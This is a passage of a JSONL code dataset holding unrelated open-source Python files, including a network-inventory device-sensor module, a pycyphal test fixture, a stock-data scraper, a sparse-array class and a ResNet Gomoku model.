'SET_NOTIFICATION_COND' : self.handle_set_notification_cond,\n 'GET_REPORT_TEMPLATE' : self.handle_get_report_template,\n 'SET_REPORT_TEMPLATE' : self.handle_set_report_template,\n }\n\n # Mapping tuples of gui hostnames and request id's to command id's\n self.active_command_connections = dict()\n\n\n def activate(self):\n logging.info('DeviceSensor: Activating module ...')\n\n # Get the Agent tracker and Command Tracker\n self.agent_listener = self.shell.get_module('AgentListener')\n if self.agent_listener is None:\n err_msg = 'DeviceSensor: Required AgentListener module not installed'\n logging.error(err_msg)\n return\n\n self.command_tracker = self.agent_listener.command_tracker\n self.agent_tracker = self.agent_listener.agent_tracker\n\n\n def deactive(self):\n logging.info('DeviceSensor: Deactivating module ...')\n\n\n def refresh_settings(self):\n pass\n\n\n def get_name(self):\n return 'DeviceSensor'\n\n\n def init_default_settings(self):\n self.options[InventoryConfig.module_enabled] = True\n\n\n def init_database_operations(self):\n pass\n\n\n def evaluate_request(self, request, data_connection):\n logging.debug('DeviceSensor: Evaluating request ...')\n \n req_id = request.get_request_id()\n device_sensor_request = DeviceSensorRequest(request)\n if not device_sensor_request.sanity_check():\n logging.warning('DeviceSensor: Invalid request')\n response = ServerInterface.build_invalid_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n if self.command_tracker is None:\n logging.warning('DeviceSensor: CommandTracker not found')\n response = ServerInterface.build_internal_error_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n request_type = device_sensor_request.get_type()\n try:\n self.request_handlers[request_type](device_sensor_request, req_id,\n data_connection)\n except:\n logging.warning('DeviceSensor: Invalid request type', exc_info=True)\n\n\n def handle_real_time_request(self, device_sensor_request, req_id,\n data_connection):\n agent_hostname = device_sensor_request.get_agent_hostname()\n\n command_id = self.command_tracker.send_command(\n agent_hostname, 'DeviceSensor', 'REAL_TIME_REQUEST',\n handler_function=self.real_time_command_callback,\n handler_user_data=data_connection)\n\n if command_id is None:\n logging.warning('DeviceSensor: Error sending command')\n response = ServerInterface.build_internal_error_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n gui_hostname = data_connection.peer_host\n self.active_command_connections[(gui_hostname, req_id)] =\\\n command_id\n\n\n def real_time_command_callback(self, message, command_id,\n handler_user_data, command_connection, closed=False):\n if closed:\n logging.debug('DeviceSensor: Command Connection %d closed',\n command_id)\n message = dict()\n message['state'] = 'DOWN'\n else:\n message['state'] = 'UP'\n\n response = ServerInterface.build_accepted_response(-1)\n response[ResponseFields.response_type] = 'DEVICE_SENSOR_REAL_TIME_REQUEST'\n response[ResponseFields.body] = message\n\n data_connection = handler_user_data\n sent_ok = data_connection.send_message(json.dumps(response), True)\n\n # Check the requesting application didn't went down\n if not sent_ok:\n return False\n\n return True\n\n\n def handle_real_time_close(self, device_sensor_request, req_id,\n data_connection):\n close_request = DeviceSensorRealTimeClose(device_sensor_request)\n if not close_request.sanity_check():\n response = ServerInterface.build_invalid_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n return\n\n original_req_id = close_request.get_request_id()\n gui_hostname = data_connection.peer_host\n try:\n command_id = self.active_command_connections[(gui_hostname,\n original_req_id)]\n agent_hostname = device_sensor_request.get_agent_hostname()\n self.command_tracker.close_command_connection(agent_hostname,\n command_id)\n except:\n pass\n\n response = ServerInterface.build_accepted_response(req_id)\n data_connection.send_message(json.dumps(response), True)\n \n\n def handle_get_notification_cond(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n def handle_set_notification_cond(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n\n def handle_get_report_template(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n def handle_set_report_template(self, device_sensor_request,\n req_id, data_connection):\n #TODO\n pass\n\n\n def shutdown(self):\n pass\n\n\n\nclass DeviceSensorRequest:\n\n def __init__(self, request):\n self.request = request\n\n self.type = None\n self.body = None\n self.agent_hostname = None\n\n\n def sanity_check(self):\n \"\"\" Checks the fields. Must be called after initialization \"\"\"\n # Check the type\n try:\n self.type = self.request.body[DeviceSensorRequestBody.type]\n except:\n err_msg = 'ServerInterface: Missing type from device sensor request'\n logging.warning(err_msg)\n return False\n\n # Check the body (optional)\n if DeviceSensorRequestBody.body in self.request.body:\n self.body = self.request.body[DeviceSensorRequestBody.body]\n\n # Check the agent hostname\n try:\n self.agent_hostname =\\\n self.request.body[DeviceSensorRequestBody.agent_hostname]\n except:\n err_msg = 'ServerInterface: Missing hostname from device'\n err_msg += ' sensor request'\n logging.warning(err_msg)\n return False\n\n return True\n\n\n def get_type(self):\n return self.type\n\n\n def get_body(self):\n return self.body\n\n\n def get_agent_hostname(self):\n return self.agent_hostname\n\n\n\nclass DeviceSensorRealTimeClose:\n\n def __init__(self, device_sensor_request):\n self.body = device_sensor_request.get_body()\n\n self.req_id = None\n\n\n def sanity_check(self):\n try:\n self.req_id = self.body[DeviceSensorRealTimeCloseBody.req_id]\n except:\n err_msg = 'ServerInterface: Missing req_id from device sensor'\n err_msg += ' real time stop request'\n logging.warning(err_msg)\n return False\n \n return True\n\n\n def get_request_id(self):\n return self.req_id\n\n\n\nclass DeviceSensorRequestBody:\n \"\"\"\n * type: The type of the request. This can have one of the\n following values:\n - \"REAL_TIME_REQUEST\": The requesting side wants to receive real time\n information about the device CPU%, RAM%, Network Received and Sent\n bytes over the last second.\n - \"REAL_TIME_CLOSE\": The requesting wants to stop receiving real time\n information.\n - \"GET_NOTIFICATION_COND\": Get the JSON with the associated notification\n conditions for the Device Sensor.\n - \"SET_NOTIFICATION_COND\": Set the JSON with the associated notification\n conditions for the Device Sensor.\n - \"GET_REPORT_TEMPLATE\": Get the pre-formatted body of the report.\n - \"SET_REPORT_TEMPLATE\": Set the pre-formatted body of the report.\n * body: The body of the request.\n * agent_hostname: The hostname on which the agent is installed.\n \"\"\"\n type = 'device_sensor_type'\n body = 'device_sensor_body'\n agent_hostname = 'agent_hostname'\n\n\n\nclass DeviceSensorRealTimeCloseBody:\n \"\"\"\n The fields for the body of the request when type is \"REAL_TIME_CLOSE\":\n * req_id: The request id of the original \"REAL_TIME_REQUEST\".\n \"\"\"\n req_id = 'req_id'","repo_name":"umitproject/network-inventory","sub_path":"umit/inventory/modules/server/DeviceSensor.py","file_name":"DeviceSensor.py","file_ext":"py","file_size_in_byte":9484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"21411793935","text":"import sys\nimport pickle\nimport typing\nimport shutil\nimport logging\nimport functools\nimport importlib\nfrom pathlib import Path\nimport pytest\nimport pycyphal.dsdl\n\n\n# Please maintain these carefully if you're changing the project's directory structure.\nSELF_DIR = Path(__file__).resolve().parent\nLIBRARY_ROOT_DIR = SELF_DIR.parent.parent\nDEMO_DIR = LIBRARY_ROOT_DIR / \"demo\"\nDESTINATION_DIR = Path.cwd().resolve() / \".compiled\"\n\n_CACHE_FILE_NAME = \"pydsdl_cache.pickle.tmp\"\n\n\n@functools.lru_cache()\ndef compile() -> typing.List[pycyphal.dsdl.GeneratedPackageInfo]: # pylint: disable=redefined-builtin\n \"\"\"\n Runs the DSDL package generator against the standard and test namespaces, emits a list of GeneratedPackageInfo.\n Automatically adds the path to the generated packages to sys path to make them importable.\n The output is cached permanently on disk in a file in the output directory because the workings of PyDSDL or\n Nunavut are outside of the scope of responsibilities of this test suite, yet generation takes a long time.\n To force regeneration, remove the generated package directories.\n \"\"\"\n if str(DESTINATION_DIR) not in sys.path: # pragma: no cover\n sys.path.insert(0, str(DESTINATION_DIR))\n importlib.invalidate_caches()\n cache_file = DESTINATION_DIR / _CACHE_FILE_NAME\n\n if DESTINATION_DIR.exists(): # pragma: no cover\n if cache_file.exists():\n with open(cache_file, \"rb\") as f:\n out = pickle.load(f)\n assert out and isinstance(out, list)\n assert all(map(lambda x: isinstance(x, pycyphal.dsdl.GeneratedPackageInfo), out))\n return out\n\n shutil.rmtree(DESTINATION_DIR, ignore_errors=True)\n DESTINATION_DIR.mkdir(parents=True, exist_ok=True)\n\n pydsdl_logger = logging.getLogger(\"pydsdl\")\n pydsdl_logging_level = pydsdl_logger.level\n try:\n pydsdl_logger.setLevel(logging.INFO)\n out = pycyphal.dsdl.compile_all(\n [\n DEMO_DIR / \"public_regulated_data_types\" / \"uavcan\",\n DEMO_DIR / \"custom_data_types\" / \"sirius_cyber_corp\",\n SELF_DIR / \"test_dsdl_namespace\",\n ],\n DESTINATION_DIR,\n )\n finally:\n pydsdl_logger.setLevel(pydsdl_logging_level)\n\n with open(cache_file, \"wb\") as f:\n pickle.dump(out, f)\n\n assert out and isinstance(out, list)\n assert all(map(lambda x: isinstance(x, pycyphal.dsdl.GeneratedPackageInfo), out))\n return out\n\n\ncompiled = pytest.fixture(scope=\"session\")(compile)\n","repo_name":"OpenCyphal/pycyphal","sub_path":"tests/dsdl/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"75"} +{"seq_id":"12717060331","text":"def is_prime(n):\n if n <= 1:\n return False\n if n <= 3:\n return True\n if n % 2 == 0 or n % 3 == 0:\n return False\n\n i = 5\n\n while i * i <= n:\n if n % i == 0:\n return False\n i += 6\n return True\n\nli = [x for x in range(2, 10**3) if is_prime(x)]\n\nms, mr = 0, -1\n\nfor i in range(len(li)):\n s = 0\n for j in range(i, len(li)):\n s += li[j]\n if s > 10**6:\n break\n if (is_prime(s) and s > ms and j - i > mr):\n mr = j - i\n ms = s\nprint(ms, mr)\n\n","repo_name":"KafkaOnTheInternet/Project-Euler---C","sub_path":"e50.py","file_name":"e50.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30404698039","text":"\n\ndef _short(s):\n return s[:1021] + \"...\" if len(s) > 1024 else s\n\n\ndef split_text(text, MAX_LEN=1024):\n \"\"\"Return list of strings with at most MAX_LEN length, and be nice with formatting\"\"\"\n if \"```\" in text:\n MAX_LEN = max(1, MAX_LEN-3)\n ret = []\n if \"--message-split--\" in text:\n texts = text.split(\"--message-split--\")\n for t in texts:\n ret += split_text(t)\n return ret\n num_block_markers = 0\n need_block_begin = False\n while len(text):\n msg = text[:MAX_LEN]\n num_block_markers += msg.count(\"```\")\n if len(msg) < MAX_LEN:\n chunk = len(msg)\n else:\n chunk = -1\n for sep in (\"\\n\", \" \", \".\", \";\", \",\"):\n chunk = msg.rfind(sep)\n if chunk > 0:\n if sep in (\"\\n\", \" \"):\n text = text[:chunk] + text[chunk + 1:]\n break\n if chunk < 0:\n chunk = MAX_LEN\n\n msg = text[:chunk]\n if not len(msg):\n break\n if need_block_begin:\n msg = \"```\" + msg\n need_block_begin = False\n if num_block_markers % 2 == 1:\n msg += \"```\"\n need_block_begin = True\n ret.append(msg)\n text = text[chunk:]\n return ret\n","repo_name":"defgsus/brain-discord","sub_path":"tools/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72942166642","text":"import os\nimport shutil\nimport tarfile\nimport subprocess\nfrom glob import glob\n\nffmpeg_exe = \"C:\\\\Users\\\\86712\\\\source\\\\ffmpeg\\\\bin\\\\ffmpeg.exe\"\nStereoBlur_root = \"D:\\\\dataset\\\\StereoBlur\\\\\"\nStereoBlur_out_root = \"D:\\\\dataset\\\\StereoBlur_processed\\\\\"\n\nfile_list = glob(os.path.join(StereoBlur_root, \"HD*.tar.gz\"))\nfor file_name in file_list:\n file_base = os.path.basename(file_name).split('.')[0]\n file = tarfile.open(file_name, 'r:gz')\n file.extractall(StereoBlur_root)\n\n extrachpath = os.path.join(StereoBlur_root, file_base)\n image_left_path = os.path.join(extrachpath, \"image_left\")\n image_right_path = os.path.join(extrachpath, \"image_right\")\n\n converter_args = [\n ffmpeg_exe,\n '-i', os.path.join(image_left_path, \"%04d.png\"),\n '-i', os.path.join(image_right_path, \"%04d.png\"),\n '-filter_complex', \"hstack\",\n '-c:v', 'libx264',\n os.path.join(StereoBlur_out_root, f\"{file_base}.mp4\")\n ]\n\n converter_output = (subprocess.check_output(converter_args))\n print(f\"removing extracted folder {file_base}\")\n shutil.rmtree(extrachpath)\n","repo_name":"limacv/mono_mpv","sub_path":"script/preprocess_stereoblur.py","file_name":"preprocess_stereoblur.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22247697979","text":"import numpy as np\r\nfrom functools import reduce\r\nfrom operator import mul\r\nfrom sparse import SparseArray\r\nfrom sparse.coo.common import linear_loc\r\nfrom sparse.utils import normalize_axis, equivalent, check_zero_fill_value, _zero_of_dtype\r\nimport sparse\r\nimport scipy.sparse as ss\r\nfrom .convert import compress_dimension, uncompress_dimension\r\nfrom .indexing import getitem\r\n\r\n\r\n\r\ndef _from_coo(x,format):\r\n midpoint = int(len(x.shape) // 2)\r\n midpoint = midpoint + 1 if len(x.shape) % 2 == 1 else midpoint # where do col axes start\r\n if len(x.shape)==3:\r\n midpoint = 2\r\n row_size = int(np.prod(x.shape[:midpoint]))\r\n col_size = int(np.prod(x.shape[midpoint:]))\r\n coords = x.reshape((row_size,col_size)).coords\r\n\r\n if format is 'CSR':\r\n indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(coords[0], minlength=row_size), out=indptr[1:])\r\n indices = coords[1]\r\n data = x.data\r\n else: \r\n linear = linear_loc(coords[[1,0]],(col_size,row_size))\r\n order = np.argsort(linear)\r\n coords = coords[:,order]\r\n indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(coords[1], minlength=col_size), out=indptr[1:])\r\n indices = coords[0]\r\n data = x.data[order]\r\n return (data,indices,indptr), x.shape, x.fill_value\r\n\r\nclass compressed(SparseArray):\r\n\r\n def __init__(self,arg,shape=None,fill_value=0):\r\n\r\n if isinstance(arg,np.ndarray):\r\n arg, shape, fill_value = _from_coo(sparse.COO(arg),self.format)\r\n\r\n elif isinstance(arg,sparse.coo.core.COO):\r\n arg, shape, fill_value = _from_coo(arg,self.format)\r\n\r\n if isinstance(arg,tuple):\r\n data,indices,indptr = arg\r\n self.data = data\r\n self.indices = indices\r\n self.indptr = indptr\r\n self.shape = shape\r\n sl = len(shape)\r\n row_size = int(np.prod(shape[:sl//2+1]) if sl%2==1 else np.prod(shape[:sl//2]))\r\n col_size = int(np.prod(shape[sl//2+1:]) if sl%2==1 else np.prod(shape[sl//2:]))\r\n self.compressed_shape = (row_size,col_size)\r\n self.fill_value = fill_value\r\n self.dtype = self.data.dtype\r\n\r\n @classmethod\r\n def from_numpy(cls,x,fill_value=0):\r\n coo = sparse.COO(x,fill_value=fill_value)\r\n return cls.from_coo(coo)\r\n\r\n\r\n @classmethod\r\n def from_coo(cls,x):\r\n arg, shape, fill_value = _from_coo(x,cls.format)\r\n return cls(arg,shape=shape,fill_value=fill_value)\r\n\r\n @classmethod\r\n def from_scipy_sparse(cls,x):\r\n if cls.format is 'CSR':\r\n x = x.asformat('csr')\r\n return cls((x.data,x.indices,x.indptr),shape=x.shape)\r\n else:\r\n x = x.asformat('csc')\r\n return cls((x.data,x.indices,x.indptr),shape=x.shape)\r\n \r\n\r\n @classmethod\r\n def from_iter(cls,x,shape=None,fill_value=None):\r\n return cls.from_coo(sparse.COO.from_iter(x,shape,fill_value))\r\n\r\n @property\r\n def nnz(self):\r\n return self.data.shape[0]\r\n\r\n @property\r\n def nbytes(self):\r\n return self.data.nbytes + self.indices.nbytes + self.indptr.nbytes\r\n \r\n @property\r\n def density(self):\r\n return self.nnz / reduce(mul,self.shape)\r\n\r\n @property\r\n def ndim(self):\r\n return len(self.shape)\r\n\r\n def __str__(self):\r\n return '<{}: shape={}, dtype={}, nnz={}, fill_value={}>'.format(self.format,self.shape,self.dtype,self.nnz,self.fill_value)\r\n\r\n __repr__ = __str__ \r\n\r\n\r\n __getitem__ = getitem\r\n\r\n def tocoo(self):\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is 'CSR' else np.vstack((self.indices,uncompressed))\r\n return sparse.COO(coords,self.data,shape=self.compressed_shape,fill_value=self.fill_value).reshape(self.shape) \r\n\r\n def todense(self): \r\n return self.tocoo().todense()\r\n \r\n\r\n def todok(self):\r\n\r\n from sparse import DOK \r\n return DOK.from_coo(self.tocoo()) # probably a temporary solution\r\n\r\n\r\n def to_scipy_sparse(self):\r\n \"\"\"\r\n Converts this :obj:`CSR` or `CSC` object into a :obj:`scipy.sparse.csr_matrix` or `scipy.sparse.csc_matrix`.\r\n Returns\r\n -------\r\n :obj:`scipy.sparse.csr_matrix` or `scipy.sparse.csc_matrix`\r\n The converted Scipy sparse matrix.\r\n Raises\r\n ------\r\n ValueError\r\n If the array is not two-dimensional.\r\n ValueError\r\n If all the array doesn't zero fill-values.\r\n \"\"\"\r\n \r\n check_zero_fill_value(self)\r\n\r\n if self.ndim != 2:\r\n raise ValueError(\"Can only convert a 2-dimensional array to a Scipy sparse matrix.\")\r\n\r\n if self.format is 'CSR':\r\n return ss.csr_matrix((self.data,self.indices,self.indptr),shape=self.shape)\r\n else:\r\n return ss.csc_matrix((self.data,self.indices,self.indptr),shape=self.shape)\r\n\r\n \r\n def asformat(self,format):\r\n \"\"\"\r\n Convert this sparse array to a given format.\r\n Parameters\r\n ----------\r\n format : str\r\n A format string.\r\n Returns\r\n -------\r\n out : SparseArray\r\n The converted array.\r\n Raises\r\n ------\r\n NotImplementedError\r\n If the format isn't supported.\r\n \"\"\"\r\n\r\n if format is 'coo':\r\n return self.tocoo()\r\n elif format is 'csc':\r\n return self.tocsc()\r\n elif format is 'csr':\r\n return self.tocsr()\r\n elif format is 'dok':\r\n return self.todok()\r\n \r\n raise NotImplementedError('The given format is not supported.')\r\n\r\n\r\n def maybe_densify(self, max_size=1000, min_density=0.25):\r\n \"\"\"\r\n Converts this :obj:`CSR` or `CSC` array to a :obj:`numpy.ndarray` if not too\r\n costly.\r\n Parameters\r\n ----------\r\n max_size : int\r\n Maximum number of elements in output\r\n min_density : float\r\n Minimum density of output\r\n Returns\r\n -------\r\n numpy.ndarray\r\n The dense array.\r\n Raises\r\n -------\r\n ValueError\r\n If the returned array would be too large.\r\n \"\"\"\r\n\r\n if self.size <= max_size or self.density >= min_density:\r\n return self.todense()\r\n else:\r\n raise ValueError(\"Operation would require converting \"\r\n \"large sparse array to dense\")\r\n \r\n\r\n def reshape(self,shape, order='C'):\r\n \"\"\"\r\n Returns a new :obj:`CSR` or `CSC` array that is a reshaped version of this array.\r\n Parameters\r\n ----------\r\n shape : tuple[int]\r\n The desired shape of the output array.\r\n Returns\r\n -------\r\n CSR or CSC\r\n The reshaped output array.\r\n See Also\r\n --------\r\n numpy.ndarray.reshape : The equivalent Numpy function.\r\n sparse.COO.reshape: The equivalent COO function.\r\n Notes\r\n -----\r\n The :code:`order` parameter is provided just for compatibility with\r\n Numpy and isn't actually supported.\r\n \r\n \"\"\"\r\n\r\n\r\n if order not in {'C', None}:\r\n raise NotImplementedError(\"The 'order' parameter is not supported\")\r\n if any(d == -1 for d in shape):\r\n extra = int(self.size /\r\n np.prod([d for d in shape if d != -1]))\r\n shape = tuple([d if d != -1 else extra for d in shape])\r\n\r\n if self.shape==shape:\r\n return self\r\n \r\n if self.size != reduce(mul,shape,1):\r\n raise ValueError('cannot reshape array of size {} into shape {}'.format(self.size,shape))\r\n \r\n midpoint = int(len(shape)//2)\r\n midpoint = midpoint + 1 if len(shape) % 2 == 1 else midpoint\r\n row_size = np.prod(shape[:midpoint])\r\n col_size = np.prod(shape[midpoint:])\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is \"CSR\" else np.vstack((self.indices,uncompressed))\r\n reshaped_coords = sparse.COO(coords,self.data,shape=self.compressed_shape).reshape((row_size,col_size)).coords\r\n\r\n if self.format is 'CSR':\r\n indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(reshaped_coords[0], minlength=row_size), out=indptr[1:])\r\n indices = reshaped_coords[1]\r\n else:\r\n indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(reshaped_coords[1], minlength=col_size), out=indptr[1:])\r\n indices = reshaped_coords[0]\r\n \r\n return self.__class__((self.data,indices,indptr),shape=shape,fill_value=self.fill_value)\r\n \r\n \r\n \r\n\r\n def resize(self, *args, refcheck=True):\r\n \"\"\"\r\n This method changes the shape and size of an array in-place.\r\n \r\n Parameters\r\n ----------\r\n args : tuple, or series of integers\r\n The desired shape of the output array.\r\n \r\n See Also\r\n --------\r\n numpy.ndarray.resize : The equivalent Numpy function.\r\n sparse.COO.resize : The equivalent COO function.\r\n\r\n \"\"\"\r\n \r\n if len(args) == 1 and isinstance(args[0], tuple):\r\n shape = args[0]\r\n elif all(isinstance(arg, int) for arg in args):\r\n shape = tuple(args)\r\n else:\r\n raise ValueError('Invalid input')\r\n\r\n \r\n if any(d < 0 for d in shape):\r\n raise ValueError('negative dimensions not allowed')\r\n \r\n if self.shape==shape:\r\n return\r\n \r\n \r\n midpoint = int(len(shape)//2)\r\n midpoint = midpoint + 1 if len(shape) % 2 == 1 else midpoint\r\n row_size = np.prod(shape[:midpoint])\r\n col_size = np.prod(shape[midpoint:])\r\n uncompressed = uncompress_dimension(self.indptr,self.indices)\r\n coords = np.vstack((uncompressed,self.indices)) if self.format is \"CSR\" else np.vstack((self.indices,uncompressed))\r\n resized = sparse.COO(coords,self.data,shape=self.compressed_shape).resize((row_size,col_size))\r\n resized_coords = resized.coords\r\n self.data = resized.data\r\n self.shape = shape\r\n\r\n if self.format is 'CSR':\r\n self.indptr = np.zeros(row_size+1,dtype=int)\r\n np.cumsum(np.bincount(resized_coords[0], minlength=row_size), out=self.indptr[1:])\r\n self.indices = resized_coords[1]\r\n else:\r\n self.indptr = np.zeros(col_size+1,dtype=int)\r\n np.cumsum(np.bincount(resized_coords[1], minlength=col_size), out=self.indptr[1:])\r\n self.indices = resized_coords[0]\r\n \r\n","repo_name":"daletovar/csparse","sub_path":"GCRS2/compressed.py","file_name":"compressed.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"70591725364","text":"import argparse\nimport time\n\nfrom relay_base_class import (FuzzMRelayBaseThreadClass)\n\nclass PrintRelay(FuzzMRelayBaseThreadClass):\n\n def __init__(self, host):\n super(PrintRelay, self).__init__(host,queue_bound=100)\n \n def processTestVector(self,msg):\n print(\"Test Vector \" + str(time.time() // 1))\n time.sleep(1)\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Run the Slow Relay\")\n parser.add_argument('-a', '--amqp', help=\"URL of AMQP server\")\n parser.set_defaults(amqp='localhost')\n args = parser.parse_args()\n\n relay = PrintRelay(args.amqp)\n relay.start()\n try:\n relay.join()\n except KeyboardInterrupt:\n relay.stop()\n relay.join()\n\nif __name__ == '__main__':\n main()\n","repo_name":"collins-research/FuzzM","sub_path":"relay-base/slow.py","file_name":"slow.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"27497685053","text":"from bs4 import BeautifulSoup\nimport sys\nfrom time import time\nfrom nzxscraper.scrape_data import get_browser, list_companies, scrape_company\nfrom nzxscraper.save_data import save_data, save_log_to_pastebin\nfrom nzxscraper.environment import DEBUG, downloadDirectory, COMPANIES\nimport shutil\nfrom nzxscraper import logger, printProgressBar\nfrom nzxscraper.analyse import analyse_company_risk, score_companies\n\ndef start_scraping():\n # Log environment\n logger.info(\"Download directory: \" + downloadDirectory)\n startTime = time()\n browser = get_browser()\n success = False\n\n try:\n stockTickersList = list_companies(browser)\n\n # Initialise the array which is going to store Stock class objects\n stockDataArray = []\n\n # For each ticker in the list, find the link to the respective summary page\n stockIteration = 0\n printProgressBar(stockIteration, len(stockTickersList), prefix='Scraping company data', suffix = 'of companies completed', length=50)\n for stock in stockTickersList :\n stockData = scrape_company(browser, stock)\n stockDataArray.append(stockData)\n stockIteration += 1\n printProgressBar(stockIteration, len(stockTickersList), prefix='Scraping company data', suffix = 'of companies completed', length=50)\n success = True\n logger.info(\"Scraping complete\")\n print(\"Scraping complete\")\n finally:\n browser.quit()\n if success:\n analyse_company_risk(stockDataArray)\n score_companies(stockDataArray)\n save_data(stockDataArray, success)\n logger.info(\"Temporary files deleted\")\n shutil.rmtree(downloadDirectory)\n\n endTime = time()\n logger.info(\"That took a total of: \" + str(round(endTime-startTime)) + \" seconds.\")\n logger.info(str(round((endTime-startTime)/COMPANIES)) + \" seconds per company.\")\n logger.info(\"Scraping and saving complete\")\n print(\"That took a total of: \" + str(round(endTime-startTime)) + \" seconds.\")\n print(str(round((endTime-startTime)/COMPANIES)) + \" seconds per company.\")\n print(\"Scraping and saving complete\")\n # Pastebin logs are currently disabled as feature is not working as intended\n # save_log_to_pastebin()\n\nif __name__ == \"__main__\":\n start_scraping()\n","repo_name":"DrCoco/NZXDataScrapper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"19888057036","text":"'''\npython program to find if integer n is a palindrome\nInputs: n - int\nOutputs: ans - boolean\nHow to do it?\nInput n\nInitialise mirror_n = 0\nRepeat\n\tFind the last digit of n\n\tInclude the last digit of n in mirror_n\n\tRemove the last digit of n\nTest if n is equal to mirror_n\n'''\n\nimport math\n\ndef isPalindrome():\n\t\n\t# input n\n\tn = int(input(\"n = \"))\n\t\n\t# initialaze a variable equal to n to test at the end\n\tn2 = n\n\t\n\t# initialize the mirror of n to 0\n\tmirror_n = 0\n\t\n\t\n\twhile n != 0:\n\t\t# find the last digit of n\n\t\tlast = n%10\n\t\t# append last to mirror_n\n\t\tmirror_n = mirror_n * 10 + last\n\t\t# remove the last digit of n\n\t\tn = n//10\n\t\n\tif n2 == mirror_n:\n\t\tans = True\n\t\t\n\telse:\n\t\tans = False\n\t\t\n\tprint(\"Is n palindrome? \", ans)\n\t\t\nisPalindrome()","repo_name":"michealodwyer26/MPT-Senior","sub_path":"Homework/Week 4/isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28684069203","text":"from pathlib import Path\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom torchvision.models.resnet import BasicBlock, Bottleneck, ResNet\n\nclass Flatten(nn.Module):\n def forward(self, input):\n return input.view(input.size(0), -1)\n\nclass ResNetGomoku(ResNet):\n def __init__(self, config):\n nn.Module.__init__(self)\n\n block = BasicBlock if config.get('res_basic_block', True) else Bottleneck \n inplanes = config.get('res_inplanes', [64, 128, 256, 512])\n num_blocks = config.get('res_num_blocks', [3, 4, 6, 3])\n self.inplanes = inplanes[0]\n self.groups = config.get('res_groups', 1)\n self.base_width = config.get('res_base_width', 64)\n \n layers = [self._make_layer(block, inplane, num_block) for inplane, num_block in zip(inplanes, num_blocks)]\n self.shared = nn.Sequential(\n nn.Conv2d(config.state_size, inplanes[0], kernel_size=5, stride=1, padding=2),\n nn.BatchNorm2d(inplanes[0]),\n nn.ReLU(inplace=True),\n *layers\n )\n\n out_plane = inplanes[-1]\n\n self.value_head = nn.Sequential(\n nn.Conv2d(out_plane, 1, kernel_size=1),\n nn.BatchNorm2d(1),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(config.board_dim ** 2, 256),\n nn.ReLU(inplace=True),\n nn.Linear(256, 1)\n )\n\n self.policy_head = nn.Sequential(\n nn.Conv2d(out_plane, 2, kernel_size=1),\n nn.BatchNorm2d(2),\n nn.ReLU(inplace=True),\n Flatten(),\n nn.Linear(2 * config.board_dim ** 2, config.board_dim ** 2)\n )\n\n self.loss_value = nn.MSELoss()\n self.optimizer = optim.Adam(self.parameters(), lr=config.lr, weight_decay=config.l2_reg)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n # Zero-initialize the last BN in each residual branch,\n # so that the residual branch starts with zeros, and each residual block behaves like an identity.\n # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n elif isinstance(m, BasicBlock):\n nn.init.constant_(m.bn2.weight, 0)\n \n def forward(self, x, label_value=None, label_policy=None):\n s = self.shared(x)\n v_, p_ = self.value_head(s), self.policy_head(s)\n mask = x[:, :2].sum(dim=1).byte()\n # p_.data.masked_fill_(mask.reshape(p_.shape), -np.inf)\n \n v = v_.tanh()\n p = p_.log_softmax(dim=-1).reshape(mask.shape)\n # p.data.masked_fill_(mask, 0)\n\n if label_value is None:\n return 0, dict(value=v, policy=p.exp())\n loss_value = self.loss_value(v.squeeze(dim=1), label_value)\n log_label = label_policy.log()\n log_label[torch.isinf(log_label)] = 0\n\n loss_policy = (label_policy * (log_label - p)).sum(dim=(1, 2)).mean()\n loss = loss_value + loss_policy\n entropy = -(p * p.exp()).sum(dim=(1, 2)).mean()\n return loss, dict(loss=loss, loss_value=loss_value, 